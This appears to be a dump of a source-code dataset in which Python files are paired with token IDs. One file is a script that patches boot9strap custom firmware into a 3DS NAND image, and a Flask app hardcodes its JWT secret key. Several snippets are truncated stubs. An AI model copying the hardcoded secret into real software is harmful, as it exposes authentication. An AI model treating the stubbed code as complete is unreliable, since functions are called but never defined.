Dataset schema (per-row fields, with observed ranges):

  content            string    lengths 1 to 1.05M characters
  input_ids          list      lengths 1 to 883k
  ratio_char_token   float64   values 1 to 22.9
  token_count        int64     values 1 to 883k
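Each row pairs a source-code string (content) with its tokenization (input_ids); token_count appears to be the length of input_ids, and ratio_char_token the characters-per-token ratio, i.e. len(content) / token_count. The sketch below shows how a row's derived fields could be recomputed. It assumes the token IDs come from the GPT-2 BPE tokenizer (an assumption based on the look of the IDs, not something the dataset states), and the helper name derived_fields is made up for illustration.

    # Minimal sketch: recompute a row's derived columns from its `content` string.
    # Assumption: the tokenizer is GPT-2 BPE (not confirmed by the dataset itself).
    from transformers import GPT2TokenizerFast

    tokenizer = GPT2TokenizerFast.from_pretrained("gpt2")

    def derived_fields(content: str) -> dict:
        input_ids = tokenizer(content)["input_ids"]  # list of token IDs
        token_count = len(input_ids)
        return {
            "input_ids": input_ids,
            "token_count": token_count,
            "ratio_char_token": len(content) / token_count,  # chars per token
        }

For example, the first row below has token_count 56 and ratio_char_token 3.5, which corresponds to a content string of 196 characters.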
import numpy as np
import random
import tensorflow as tf

from shfl.data_base.data_base import shuffle_rows
from shfl.data_distribution.data_distribution_sampling import SamplingDataDistribution
[ 11748, 299, 32152, 355, 45941, 198, 11748, 4738, 198, 11748, 11192, 273, 11125, 355, 48700, 198, 198, 6738, 427, 2704, 13, 7890, 62, 8692, 13, 7890, 62, 8692, 1330, 36273, 62, 8516, 198, 6738, 427, 2704, 13, 7890, 62, 17080, 3890, 13,...
3.5
56
# -*- encoding: utf-8 -*- ''' @Time : 2021-06-08 @Author : EvilRecluse @Contact : https://github.com/RecluseXU @Desc : ''' # here put the import lib from pymongo import MongoClient from bson import ObjectId connection: MongoClient = MongoClient('mongodb://localhost:27017') collection = connection['local']['startup_log'] # # find: find find_one # collection.find # collection.find_one # mongo pymongo # mongo pymongo # filter # . SQLWHERE # _filter = {'pid': 4444} # pid4444 result = collection.find_one(_filter) print(result) # projection # # 1 # 0, 0 # _id s projection = {'_pid': 1, 'hostname': 1} result = collection.find_one(_filter, projection) print(result) collection.find_one({'_id': ObjectId('EvilMass-1619315049192')}) # _id # skip # result = collection.find(_filter, projection, skip=1) print(list(result)) # limit # result = collection.find(_filter, projection, limit=2) print(list(result)) # collection.count_documents # result = collection.count_documents({'_pid': 4444}) print(result)
[ 2, 532, 9, 12, 21004, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 7061, 6, 198, 31, 7575, 220, 220, 220, 1058, 220, 220, 33448, 12, 3312, 12, 2919, 198, 31, 13838, 220, 1058, 220, 220, 10461, 3041, 565, 1904, 198, 31, 17829, 1058, ...
2.625935
401
#!/usr/bin/env python3 import hashlib import os import shutil import subprocess import sys import time if not os.path.isfile('NAND.bin'): doexit('NAND.bin not found.', errcode=1) if os.path.isfile('firm0firm1.bak'): doexit('firm0firm1.bak was found.\n' 'In order to prevent writing a good backup with a bad one, the ' 'install has stopped. Please move or delete the old file if you ' 'are sure you want to continue. If you would like to restore, use ' '`restore-firm0firm1`.', errcode=1) if os.path.isfile('NAND-patched.bin'): doexit('NAND-patched.bin was found.\n' 'Please move or delete the patched NAND before patching another.', errcode=1) if not os.path.isfile('current.firm'): doexit('current.firm not found.', errcode=1) if not os.path.isfile('boot9strap.firm'): doexit('boot9strap.firm not found.', errcode=1) if not os.path.isfile('boot9strap.firm.sha'): doexit('boot9strap.firm.sha not found.', errcode=1) print('Verifying boot9strap.firm.') with open('boot9strap.firm.sha', 'rb') as f: b9s_hash = f.read(0x20) with open('boot9strap.firm', 'rb') as f: if hashlib.sha256(f.read(0x400000)).digest() != b9s_hash: doexit('boot9strap.firm hash check failed.', errcode=1) print('boot9strap.firm hash check passed.') readsize = 0x100000 # must be divisible by 0x3AF00000 and 0x4D800000 shutil.rmtree('work', ignore_errors=True) os.makedirs('work', exist_ok=True) overall_time = time.time() print('Trying to open NAND.bin...') with open('NAND.bin', 'rb+') as nand: print('Backing up FIRM0FIRM1 to firm0firm1.bin...') nand.seek(0xB130000) start_time = time.time() with open('firm0firm1.bak', 'wb') as f: for curr in range(0x800000 // readsize): f.write(nand.read(readsize)) print('Reading {:06X} ({:>5.1f}%)'.format((curr + 1) * readsize, (((curr + 1) * readsize) / 0x800000) * 100), end='\r') print('\nReading finished in {:>.2f} seconds.\n'.format( time.time() - start_time)) print('Creating FIRMs to xor from boot9strap.firm.') start_time = time.time() with open('current.firm', 'rb') as f: with open('work/current_pad.bin', 'wb') as b9s: b9s.write(f.read(0x400000).ljust(0x400000, b'\0') * 2) with open('boot9strap.firm', 'rb') as f: with open('work/boot9strap_pad.bin', 'wb') as b9s: b9s.write(f.read(0x400000).ljust(0x400000, b'\0') * 2) print('Creation finished in {:>.2f} seconds.\n'.format( time.time() - start_time)) print('XORing FIRM0FIRM1 with current.firm.') start_time = time.time() runcommand(['tools/lazyxor-' + sys.platform, 'firm0firm1.bak', 'work/current_pad.bin', 'work/xored.bin']) print('XORing finished in {:>.2f} seconds.\n'.format( time.time() - start_time)) print('XORing FIRM0FIRM1 with boot9strap.firm.') start_time = time.time() runcommand(['tools/lazyxor-' + sys.platform, 'work/xored.bin', 'work/boot9strap_pad.bin', 'work/final.bin']) print('XORing finished in {:>.2f} seconds.\n'.format( time.time() - start_time)) print('Writing final FIRMs to NAND.bin.') with open('work/final.bin', 'rb') as f: firm_final = f.read(0x800000) nand.seek(0xB130000) start_time = time.time() for curr in range(0x800000 // readsize): print('Writing {:06X} ({:>5.1f}%)'.format((curr + 1) * readsize, (((curr + 1) * readsize) / 0x800000) * 100), end='\r') nand.write(bytes(firm_final[curr * readsize:(curr + 1) * readsize])) print('\nWriting finished in {:>.2f} seconds.'.format( time.time() - start_time)) os.rename('NAND.bin', 'NAND-patched.bin') doexit('boot9strap install process finished in {:>.2f} seconds.'.format( time.time() - overall_time))
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 11748, 12234, 8019, 198, 11748, 28686, 198, 11748, 4423, 346, 198, 11748, 850, 14681, 198, 11748, 25064, 198, 11748, 640, 628, 198, 198, 361, 407, 28686, 13, 6978, 13, 4468, 5...
2.204059
1,774
import concurrent
import time
import math
import sys
import asyncio
import logging
from . import msg
from .parse_error import ParseError

from . import DEBUG_LEVEL

logger = logging.getLogger(__name__)
logger.setLevel(DEBUG_LEVEL)
[ 11748, 24580, 198, 11748, 640, 198, 11748, 10688, 198, 11748, 25064, 198, 11748, 30351, 952, 198, 11748, 18931, 198, 6738, 764, 1330, 31456, 198, 6738, 764, 29572, 62, 18224, 1330, 2547, 325, 12331, 198, 198, 6738, 764, 1330, 16959, 62, ...
3.295775
71
from common_clustering import CommonClustering #clustering_features = CommonClustering(r'C:\Users\ivangarrera\Desktop\T2_cleaned.csv') clustering_features = CommonClustering('D:\Ing. Informatica\Cuarto\Machine Learning\T2_cleaned_gyroscope.csv') attr = list(clustering_features.data_set)[0][:list(clustering_features.data_set)[0].find('_')] clustering_features.attr = attr clustering_features.PrincipalComponentAnalysis(num_components=2) # Get the number of clusters that provides the best results ideal_number_of_clusters = clustering_features.getBestNumberOfClusters() # Plot silhuettes array clustering_features.PlotSilhouettes() # Print k-means with the best number of clusters that have been found labels = clustering_features.KMeansWithIdeal(ideal_number_of_clusters) # Interprate k-means groups clustering_features.data_set['labels'] = labels data_set_labels_mean = clustering_features.data_set.groupby(['labels']).mean() # Plot 3D graph to interpretate k-means groups import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D fig = plt.figure() ax = Axes3D(fig) ax.scatter(data_set_labels_mean.values[:,0], data_set_labels_mean.values[:,1], data_set_labels_mean.values[:,2]) plt.savefig(r'../../reports/figures/centroids3D_{}.png'.format(attr)) plt.show() # Agglomerative clustering algorithm using nearest neighbors matrix clustering_features.AgglomerativeClusteringWithNearestNeighbors() # DBSCAN Clustering algorithm labels = clustering_features.DBSCANClustering() # Interprate outliers clustering_features.data_set['labels'] = labels data_set_outliers = clustering_features.data_set.loc[(clustering_features.data_set['labels'] == -1)] # Show outliers in a 3D graph with all points in the dataset fig = plt.figure() ax = Axes3D(fig) ax.scatter(clustering_features.data_set.values[:,0], clustering_features.data_set.values[:,1], clustering_features.data_set.values[:,2]) ax.scatter(data_set_outliers.values[:,0], data_set_outliers.values[:,1], data_set_outliers.values[:,2], c='red', s=50) plt.savefig(r'../../reports/figures/outliers3D_{}.png'.format(attr)) plt.show()
[ 6738, 2219, 62, 565, 436, 1586, 1330, 8070, 2601, 436, 1586, 198, 198, 2, 565, 436, 1586, 62, 40890, 796, 8070, 2601, 436, 1586, 7, 81, 6, 34, 7479, 14490, 59, 452, 648, 9624, 430, 59, 36881, 59, 51, 17, 62, 2375, 22739, 13, 406...
2.646845
824
from blacklist import BLACKLIST
from flask import Flask, jsonify
from flask_restful import Api
from resources.hotel import Hoteis, Hotel
from resources.user import User, UserLogin, UserLogout, UserRegister, Users
from resources.site import Site, Sites
from flask_jwt_extended import JWTManager

app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['JWT_SECRET_KEY'] = 'Jbs8aGbbAyt7iMa878Pnsj'
app.config['JWT_BLACKLIST_ENABLED'] = True
api = Api(app)
jwt = JWTManager(app)

# Hotels resource
api.add_resource(Hoteis, '/hoteis')
api.add_resource(Hotel, '/hoteis/<string:hotel_id>')

# Users resource
api.add_resource(Users, '/users')
api.add_resource(User, '/users/<string:user_id>')

# User register resource
api.add_resource(UserRegister, '/register')

# Login resource
api.add_resource(UserLogin, '/login')

# Logout resource
api.add_resource(UserLogout, '/logout')

# Sites resource
api.add_resource(Sites, '/sites')
api.add_resource(Site, '/sites/<string:site_url>')

if __name__ == '__main__':
    from database.sql_alchemy import db
    db.init_app(app)
    app.run(debug=True)
[ 6738, 38810, 1330, 31963, 45849, 198, 6738, 42903, 1330, 46947, 11, 33918, 1958, 198, 6738, 42903, 62, 2118, 913, 1330, 5949, 72, 198, 6738, 4133, 13, 8940, 417, 1330, 367, 1258, 271, 11, 12696, 198, 6738, 4133, 13, 7220, 1330, 11787, ...
2.7471
431
# -*- coding: utf-8 -*-

"""Top-level package for Music Downloader Telegram Bot."""

# version as tuple for simple comparisons
VERSION = (0, 9, 16)

__author__ = """George Pchelkin"""
__email__ = 'george@pchelk.in'

# string created from tuple to avoid inconsistency
__version__ = ".".join([str(x) for x in VERSION])
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 37811, 9126, 12, 5715, 5301, 329, 7849, 10472, 263, 50203, 18579, 526, 15931, 198, 198, 2, 2196, 355, 46545, 329, 2829, 17909, 198, 43717, 796, 357, 15, 11, 860, ...
3.038462
104
import struct import pycom import time from network import LoRa def setUSFrequencyPlan(lora): """ Sets the frequency plan that matches the TTN gateway in the USA """ # remove all US915 channels for channel in range(0, 72): lora.remove_channel(channel) # set all channels to the same frequency (must be before sending the OTAA join request) ttn_start_frequency = 903900000 ttn_step_frequency = 200000 ttn_ch8_frequency = 904600000 # Set up first 8 US915 TTN uplink channels for channel in range(0, 9): if (channel == 8): channel_frequency = ttn_ch8_frequency # DR3 = SF8/500kHz channel_dr_min = 4 channel_dr_max = 4 else: channel_frequency = ttn_start_frequency + \ (channel * ttn_step_frequency) # DR0 = SF10/125kHz channel_dr_min = 0 # DR3 = SF7/125kHz channel_dr_max = 3 lora.add_channel(channel, frequency=channel_frequency, dr_min=channel_dr_min, dr_max=channel_dr_max) print("Added channel", channel, channel_frequency, channel_dr_min, channel_dr_max) def join(app_eui, app_key, useADR): """ Join the Lorawan network using OTAA. new lora session is returned """ # Set the power to 20db for US915 # You can also set the default dr value but I found that was problematic # You need to turn on adr (auto data rate) at this point if it is to be used # only use adr for static devices (Not moving) # see https://lora-developers.semtech.com/library/tech-papers-and-guides/understanding-adr/ lora = LoRa(mode=LoRa.LORAWAN, region=LoRa.US915, adr=useADR, tx_power=20) setUSFrequencyPlan(lora) print('Joining', end='') lora.join(activation=LoRa.OTAA, auth=(app_eui, app_key), timeout=0) # wait until the module has joined the network while not lora.has_joined(): time.sleep(2.5) blink(.5, 0xff8f00) # dark orange print('.', end='') print('') print('Joined') blink(2, 0x006400) # dark green return lora def send(lora, socket, port, payload, useADR): """ send data to the lorawan gateway on selected port """ blink(.5, 0x00008b) # dark blue socket.setblocking(True) socket.bind(port) print("Sending data:", payload.pack(), " Size:", payload.calcsize()) socket.send(payload.pack()) # Give send a extra second to be returned before switching # the socket blocking mode (May not need this) time.sleep(1) socket.setblocking(False) lora.nvram_save()
[ 11748, 2878, 198, 11748, 12972, 785, 198, 11748, 640, 198, 6738, 3127, 1330, 6706, 21762, 628, 198, 198, 4299, 900, 2937, 37, 28707, 20854, 7, 4685, 64, 2599, 198, 220, 220, 220, 37227, 21394, 262, 8373, 1410, 326, 7466, 262, 26653, 4...
2.410584
1,096
_base_ = [ '../_base_/models/retinanet_r50_fpn.py', '../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py' ] cudnn_benchmark = True norm_cfg = dict(type='BN', requires_grad=True) checkpoint = 'https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b3_3rdparty_8xb32-aa_in1k_20220119-5b4887a0.pth' # noqa model = dict( backbone=dict( _delete_=True, type='EfficientNet', arch='b3', drop_path_rate=0.2, out_indices=(3, 4, 5), frozen_stages=0, norm_cfg=dict( type='SyncBN', requires_grad=True, eps=1e-3, momentum=0.01), norm_eval=False, init_cfg=dict( type='Pretrained', prefix='backbone', checkpoint=checkpoint)), neck=dict( in_channels=[48, 136, 384], start_level=0, out_channels=256, relu_before_extra_convs=True, no_norm_on_lateral=True, norm_cfg=norm_cfg), bbox_head=dict(type='RetinaSepBNHead', num_ins=5, norm_cfg=norm_cfg), # training and testing settings train_cfg=dict(assigner=dict(neg_iou_thr=0.5))) # dataset settings img_norm_cfg = dict( mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True) img_size = (896, 896) train_pipeline = [ dict(type='LoadImageFromFile'), dict(type='LoadAnnotations', with_bbox=True), dict( type='Resize', img_scale=img_size, ratio_range=(0.8, 1.2), keep_ratio=True), dict(type='RandomCrop', crop_size=img_size), dict(type='RandomFlip', flip_ratio=0.5), dict(type='Normalize', **img_norm_cfg), dict(type='Pad', size=img_size), dict(type='DefaultFormatBundle'), dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']), ] test_pipeline = [ dict(type='LoadImageFromFile'), dict( type='MultiScaleFlipAug', img_scale=img_size, flip=False, transforms=[ dict(type='Resize', keep_ratio=True), dict(type='RandomFlip'), dict(type='Normalize', **img_norm_cfg), dict(type='Pad', size=img_size), dict(type='ImageToTensor', keys=['img']), dict(type='Collect', keys=['img']), ]) ] data = dict( samples_per_gpu=4, workers_per_gpu=4, train=dict(pipeline=train_pipeline), val=dict(pipeline=test_pipeline), test=dict(pipeline=test_pipeline)) # optimizer optimizer_config = dict(grad_clip=None) optimizer = dict( type='SGD', lr=0.04, momentum=0.9, weight_decay=0.0001, paramwise_cfg=dict(norm_decay_mult=0, bypass_duplicate=True)) # learning policy lr_config = dict( policy='step', warmup='linear', warmup_iters=1000, warmup_ratio=0.1, step=[8, 11]) # runtime settings runner = dict(type='EpochBasedRunner', max_epochs=12) # NOTE: This variable is for automatically scaling LR, # USER SHOULD NOT CHANGE THIS VALUE. default_batch_size = 32 # (8 GPUs) x (4 samples per GPU)
[ 62, 8692, 62, 796, 685, 198, 220, 220, 220, 705, 40720, 62, 8692, 62, 14, 27530, 14, 1186, 259, 272, 316, 62, 81, 1120, 62, 69, 21999, 13, 9078, 3256, 198, 220, 220, 220, 705, 40720, 62, 8692, 62, 14, 19608, 292, 1039, 14, 66, ...
2.137733
1,394
#!/usr/bin/env python

import datetime
import mock

import mom
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 4818, 8079, 198, 11748, 15290, 198, 198, 11748, 1995, 628, 628, 198 ]
2.913043
23
import os
import json

STOPWORDS_JSON_PATH = os.path.join(
    os.path.dirname(os.path.abspath(__file__)), os.pardir, "corpora/stopwords.json"
)
with open(STOPWORDS_JSON_PATH, "r", encoding="utf-8") as f:
    STOPWORD = json.load(f)["stopwords"]
[ 11748, 28686, 198, 11748, 33918, 198, 198, 2257, 3185, 45359, 5258, 62, 40386, 62, 34219, 796, 28686, 13, 6978, 13, 22179, 7, 198, 220, 220, 220, 28686, 13, 6978, 13, 15908, 3672, 7, 418, 13, 6978, 13, 397, 2777, 776, 7, 834, 7753, ...
2.330189
106
from __future__ import absolute_import, division, print_function

import pytest

from .. import message as msg
[ 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 11, 7297, 11, 3601, 62, 8818, 198, 198, 11748, 12972, 9288, 198, 198, 6738, 11485, 1330, 3275, 355, 31456, 628, 628 ]
3.931034
29
# -*- coding: utf-8 -*-
import os
import util
from fabric.api import *
from fabric.state import output
from fabric.colors import *

from base import BaseTask
from helper.print_helper import task_puts

collect = CollectConfig()
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 28686, 198, 11748, 7736, 198, 6738, 9664, 13, 15042, 1330, 1635, 198, 6738, 9664, 13, 5219, 1330, 5072, 198, 6738, 9664, 13, 4033, 669, 1330, 1635, 198, 198, 6738...
3.289855
69
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import unittest
import numpy as np
from inference_pass_test import InferencePassTest
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.core import AnalysisConfig

if __name__ == "__main__":
    unittest.main()
[ 2, 15069, 357, 66, 8, 12131, 350, 37382, 47, 37382, 46665, 13, 1439, 6923, 33876, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845...
3.629787
235
import argparse
import os
import shutil
from tqdm import tqdm
import logging
from src.utils.common import read_yaml, create_directories
import random
from src.utils.model import log_model_summary
import tensorflow as tf

STAGE= "Base Model Creation"

logging.basicConfig(
    filename=os.path.join("logs",'running_logs.log'),
    level=logging.INFO,
    format="[%(asctime)s: %(levelname)s: %(module)s]: %(message)s",
    filemode="a")

if __name__=="__main__":
    args=argparse.ArgumentParser()
    args.add_argument("--config", "-c", default="configs/config.yaml")
    parsed_args=args.parse_args()

    try:
        logging.info("\n*********************")
        logging.info(f">>>>>>>stage {STAGE} started <<<<<<<")
        main(config_path=parsed_args.config)
        logging.info(f">>>>>>>> stage {STAGE} completed! <<<<<<<<\n")
    except Exception as e:
        logging.exception(e)
        raise e
[ 11748, 1822, 29572, 198, 11748, 28686, 198, 11748, 4423, 346, 198, 6738, 256, 80, 36020, 1330, 256, 80, 36020, 198, 11748, 18931, 198, 6738, 12351, 13, 26791, 13, 11321, 1330, 1100, 62, 88, 43695, 11, 2251, 62, 12942, 1749, 198, 11748, ...
2.547486
358
import unittest # https://docs.python.org/3/library/unittest.html
from modules.calculator import Calculator as Calc
[ 11748, 555, 715, 395, 1303, 3740, 1378, 31628, 13, 29412, 13, 2398, 14, 18, 14, 32016, 14, 403, 715, 395, 13, 6494, 198, 6738, 13103, 13, 9948, 3129, 1352, 1330, 43597, 355, 2199, 66, 628 ]
3.342857
35
#!/usr/bin/env python3
#
# main.py
#
# Command-line utility for interacting with PSU Controller in PDDF mode in SONiC
#

try:
    import sys
    import os
    import click
    from tabulate import tabulate
    from utilities_common.util_base import UtilHelper
except ImportError as e:
    raise ImportError("%s - required module not found" % str(e))

VERSION = '2.0'

SYSLOG_IDENTIFIER = "psuutil"
PLATFORM_SPECIFIC_MODULE_NAME = "psuutil"
PLATFORM_SPECIFIC_CLASS_NAME = "PsuUtil"

# Global platform-specific psuutil class instance
platform_psuutil = None
platform_chassis = None

# Wrapper APIs so that this util is suited to both 1.0 and 2.0 platform APIs

# ==================== CLI commands and groups ====================

# This is our main entrypoint - the main 'psuutil' command
# 'version' subcommand
# 'numpsus' subcommand
# 'status' subcommand
# 'mfrinfo' subcommand
# 'seninfo' subcommand

if __name__ == '__main__':
    cli()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 198, 2, 1388, 13, 9078, 198, 2, 198, 2, 9455, 12, 1370, 10361, 329, 24986, 351, 48189, 22741, 287, 14340, 8068, 4235, 287, 311, 1340, 72, 34, 198, 2, 198, 198, 28311, 25, ...
2.9625
320
from rest_framework import serializers

from versatileimagefield.serializers import VersatileImageFieldSerializer

from .models import Image, AnimatedGif
[ 6738, 1334, 62, 30604, 1330, 11389, 11341, 198, 198, 6738, 21362, 9060, 3245, 13, 46911, 11341, 1330, 18535, 12610, 5159, 15878, 32634, 7509, 198, 198, 6738, 764, 27530, 1330, 7412, 11, 36492, 38, 361, 628, 198 ]
4.333333
36
#
# coordmap.py -- coordinate mappings.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga import trcalc
from ginga.util import wcs
from ginga.util.six.moves import map

__all__ = ['CanvasMapper', 'DataMapper', 'OffsetMapper', 'WCSMapper']

#END
[ 2, 198, 2, 6349, 8899, 13, 9078, 1377, 20435, 285, 39242, 13, 198, 2, 198, 2, 770, 318, 1280, 12, 10459, 3788, 11971, 739, 257, 347, 10305, 5964, 13, 198, 2, 4222, 766, 262, 2393, 38559, 24290, 13, 14116, 329, 3307, 13, 198, 2, ...
2.867257
113
# coding: utf-8
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.

# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#     http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
import paddle
import paddle.nn as nn
import importlib
from visualdl import LogWriter
import numpy as np
import pickle

from models import utils
from config import parser_args

if __name__ == '__main__':
    args = parser_args()
    utils.seed_paddle(args.seed)
    if not args.high_level_api:
        train_model(args)
    else:
        train_hl_api(args)
[ 2, 19617, 25, 3384, 69, 12, 23, 201, 198, 2, 15069, 357, 66, 8, 33448, 350, 37382, 47, 37382, 46665, 13, 1439, 6923, 33876, 13, 201, 198, 201, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, ...
3.091185
329
import os

from . import common

import cv2
import numpy as np
import imageio

import torch
import torch.utils.data as data
[ 11748, 28686, 198, 198, 6738, 764, 1330, 2219, 198, 198, 11748, 269, 85, 17, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 2939, 952, 198, 198, 11748, 28034, 198, 11748, 28034, 13, 26791, 13, 7890, 355, 1366, 628 ]
3.289474
38
from .contact_submission_resource import ContactSubmissionResource
[ 6738, 764, 32057, 62, 7266, 3411, 62, 31092, 1330, 14039, 7004, 3411, 26198, 198 ]
4.785714
14
# -*- coding: utf-8 -*- # Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License") # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. __author__ = 'ericbidelman@chromium.org (Eric Bidelman)' import collections import json import logging import os import webapp2 import yaml # Appengine imports. from google.appengine.api import memcache import common import models import settings import util from schedule import construct_chrome_channels_details # Add user to component subscribers. def post(self, path): params = json.loads(self.request.body) self.__update_subscribers_list(True, user_id=params.get('userId'), blink_component=params.get('componentName'), primary=params.get('primary')) # memcache.flush_all() # memcache.delete('%s|blinkcomponentowners' % (settings.MEMCACHE_KEY_PREFIX)) self.response.set_status(200, message='User added to subscribers') return self.response.write(json.dumps(params)) class SubscribersHandler(common.ContentHandler): app = webapp2.WSGIApplication([ ('/admin/blink/populate_subscribers', PopulateSubscribersHandler), ('/admin/subscribers(.*)', SubscribersHandler), ('(.*)', BlinkHandler), ], debug=settings.DEBUG)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 15069, 2177, 3012, 3457, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 4943, 198, 2, 345, 743, 407, 779, 428, ...
3.012195
574
from OBlog import database as db
from flask import g, current_app
import re


import os
[ 6738, 440, 42383, 1330, 6831, 355, 20613, 201, 198, 6738, 42903, 1330, 308, 11, 1459, 62, 1324, 201, 198, 11748, 302, 201, 198, 201, 198, 201, 198, 201, 198, 201, 198, 201, 198, 201, 198, 11748, 28686, 201, 198, 201, 198, 201, 198, ...
2.188679
53
#!/usr/bin/env python # $Id: Compiler.py,v 1.148 2006/06/22 00:18:22 tavis_rudd Exp $ """Compiler classes for Cheetah: ModuleCompiler aka 'Compiler' ClassCompiler MethodCompiler If you are trying to grok this code start with ModuleCompiler.__init__, ModuleCompiler.compile, and ModuleCompiler.__getattr__. Meta-Data ================================================================================ Author: Tavis Rudd <tavis@damnsimple.com> Version: $Revision: 1.148 $ Start Date: 2001/09/19 Last Revision Date: $Date: 2006/06/22 00:18:22 $ """ __author__ = "Tavis Rudd <tavis@damnsimple.com>" __revision__ = "$Revision: 1.148 $"[11:-2] import sys import os import os.path from os.path import getmtime, exists import re import types import time import random import warnings import __builtin__ import copy from Cheetah.Version import Version, VersionTuple from Cheetah.SettingsManager import SettingsManager from Cheetah.Parser import Parser, ParseError, specialVarRE, \ STATIC_CACHE, REFRESH_CACHE, SET_LOCAL, SET_GLOBAL,SET_MODULE from Cheetah.Utils.Indenter import indentize # an undocumented preprocessor from Cheetah import ErrorCatchers from Cheetah import NameMapper from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList VFFSL=valueFromFrameOrSearchList VFSL=valueFromSearchList VFN=valueForName currentTime=time.time DEFAULT_COMPILER_SETTINGS = { ## controlling the handling of Cheetah $placeholders 'useNameMapper': True, # Unified dotted notation and the searchList 'useSearchList': True, # if false, assume the first # portion of the $variable (before the first dot) is a global, # builtin, or local var that doesn't need # looking up in the searchlist BUT use # namemapper on the rest of the lookup 'allowSearchListAsMethArg': True, 'useAutocalling': True, # detect and call callable()'s, requires NameMapper 'useStackFrames': True, # use NameMapper.valueFromFrameOrSearchList # rather than NameMapper.valueFromSearchList 'useErrorCatcher':False, 'alwaysFilterNone':True, # filter out None, before the filter is called 'useFilters':True, # use str instead if =False 'includeRawExprInFilterArgs':True, #'lookForTransactionAttr':False, 'autoAssignDummyTransactionToSelf':False, 'useKWsDictArgForPassingTrans':True, ## controlling the aesthetic appearance / behaviour of generated code 'commentOffset': 1, # should shorter str constant chunks be printed using repr rather than ''' quotes 'reprShortStrConstants': True, 'reprNewlineThreshold':3, 'outputRowColComments':True, # should #block's be wrapped in a comment in the template's output 'includeBlockMarkers': False, 'blockMarkerStart':('\n<!-- START BLOCK: ',' -->\n'), 'blockMarkerEnd':('\n<!-- END BLOCK: ',' -->\n'), 'defDocStrMsg':'Autogenerated by CHEETAH: The Python-Powered Template Engine', 'setup__str__method': False, 'mainMethodName':'respond', 'mainMethodNameForSubclasses':'writeBody', 'indentationStep': ' '*4, 'initialMethIndentLevel': 2, 'monitorSrcFile':False, 'outputMethodsBeforeAttributes': True, ## customizing the #extends directive 'autoImportForExtendsDirective':True, 'handlerForExtendsDirective':None, # baseClassName = handler(compiler, baseClassName) # a callback hook for customizing the # #extends directive. It can manipulate # the compiler's state if needed. # also see allowExpressionsInExtendsDirective # input filtering/restriction # use lower case keys here!! 
'disabledDirectives':[], # list of directive keys, without the start token 'enabledDirectives':[], # list of directive keys, without the start token 'disabledDirectiveHooks':[], # callable(parser, directiveKey) 'preparseDirectiveHooks':[], # callable(parser, directiveKey) 'postparseDirectiveHooks':[], # callable(parser, directiveKey) 'preparsePlaceholderHooks':[], # callable(parser) 'postparsePlaceholderHooks':[], # callable(parser) # the above hooks don't need to return anything 'expressionFilterHooks':[], # callable(parser, expr, exprType, rawExpr=None, startPos=None) # exprType is the name of the directive, 'psp', or 'placeholder'. all # lowercase. The filters *must* return the expr or raise an exception. # They can modify the expr if needed. 'templateMetaclass':None, # strictly optional. Only works with new-style baseclasses 'i18NFunctionName':'self.i18n', ## These are used in the parser, but I've put them here for the time being to ## facilitate separating the parser and compiler: 'cheetahVarStartToken':'$', 'commentStartToken':'##', 'multiLineCommentStartToken':'#*', 'multiLineCommentEndToken':'*#', 'gobbleWhitespaceAroundMultiLineComments':True, 'directiveStartToken':'#', 'directiveEndToken':'#', 'allowWhitespaceAfterDirectiveStartToken':False, 'PSPStartToken':'<%', 'PSPEndToken':'%>', 'EOLSlurpToken':'#', 'gettextTokens': ["_", "N_", "ngettext"], 'allowExpressionsInExtendsDirective': False, # the default restricts it to # accepting dotted names 'allowEmptySingleLineMethods': False, 'allowNestedDefScopes': True, 'allowPlaceholderFilterArgs': True, ## See Parser.initDirectives() for the use of the next 3 #'directiveNamesAndParsers':{} 